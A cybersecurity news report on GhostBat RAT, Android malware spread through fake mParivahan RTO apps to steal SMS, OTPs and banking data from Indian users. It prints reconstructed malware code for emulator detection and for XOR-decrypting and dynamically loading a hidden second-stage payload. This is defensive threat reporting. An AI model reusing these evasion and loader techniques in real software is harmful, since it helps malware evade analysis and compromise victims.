The GhostBat RAT campaign has emerged as a sophisticated threat targeting Indian Android users through counterfeit Regional Transport Office (RTO) applications.
First observed in mid-2025, these malicious APKs masquerade as the official “mParivahan” app, exploiting user trust in government services.
Distribution occurs primarily via smishing—WhatsApp messages and SMS containing shortened URLs redirecting victims to GitHub-hosted payloads—or through compromised websites.
.webp "GhostBat RAT Android Malware With Fake RTO Apps Steals Targeting Indian Users to Steal Banking Data 2")
Once installed, the malware prompts victims to grant SMS-related permissions under the guise of essential updates, setting the stage for banking data exfiltration.
Upon installation, the app displays a phishing interface remarkably similar to the genuine mParivahan layout.
The victim is prompted to enter vehicle and mobile details, followed by a fake UPI payment request of ₹1 to “verify ownership.”
Meanwhile, SMS messages containing banking-related keywords are harvested and exfiltrated to attacker-controlled servers.
Incoming one-time passwords (OTPs) can be forwarded directly to adversaries, facilitating unauthorized transactions.
Cyble analysts noted the incorporation of a Telegram bot, GhostBatRatbot, which registers infected devices and serves as a command channel for stolen data.
Underneath the social engineering facade, GhostBat RAT relies on multiple anti-analysis and obfuscation tactics.
The initial dropper performs anti-emulation checks by interrogating Build.CPU_ABI and Build.MANUFACTURER values, terminating execution if an emulator is detected.
Sample code from this stage illustrates the heavy string obfuscation and emulator avoidance logic:
public static boolean isRealDevice(String abi) {
if (abi.equals("x86") || abi.equals("x86_64")) {
return false;
}
String manufacturer = Build.MANUFACTURER.toLowerCase(Locale.ROOT);
if (manufacturer.contains("generic") || manufacturer.contains("emulator")) {
return false;
}
return true;
}.webp "GhostBat RAT Android Malware With Fake RTO Apps Steals Targeting Indian Users to Steal Banking Data 4")
A multi-stage dropper then decrypts embedded payloads using XOR operations and dynamic DexClassLoader loading, ensuring detection evasion.
Native libraries (.so) further complicate analysis by reconstructing API calls in memory via JNI. These layers collectively hinder reverse engineering and antivirus detection.
GhostBat RAT’s Infection Mechanism
Here the complete infection mechanism leverages smishing URLs disguised as RTO services. Upon clicking a shortened link, users download an APK hosted on GitHub or similar platforms.
The installer requests SMS-read and SMS-send permissions, which victims often grant under the pretext of service functionality.
Once permissions are in place, the dropper decrypts its second-stage payload:-
InputStream in = context.getAssets().open("encrypted_payload");
byte[] data = new byte[in.available()];
in.read(data);
in.close();
byte[] key = MessageDigest.getInstance("SHA-1")
.digest("encrypted_payload".getBytes(StandardCharsets.UTF_8));
for (int i = 0; i < data.length; i++) {
data[i] ^= key[i % key.length];
}
DexClassLoader loader = new DexClassLoader(
saveToFile(data), context.getCacheDir().getAbsolutePath(),
null, context.getClassLoader()
);This decrypted component houses the credential stealer and cryptominer modules, which are loaded dynamically.
The final payload mimics a genuine app update page, tricking users into installing the malicious mParivahan app.
By chaining these stages, GhostBat RAT achieves stealthy installation and robust persistence, making it a significant risk to Indian mobile banking users.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
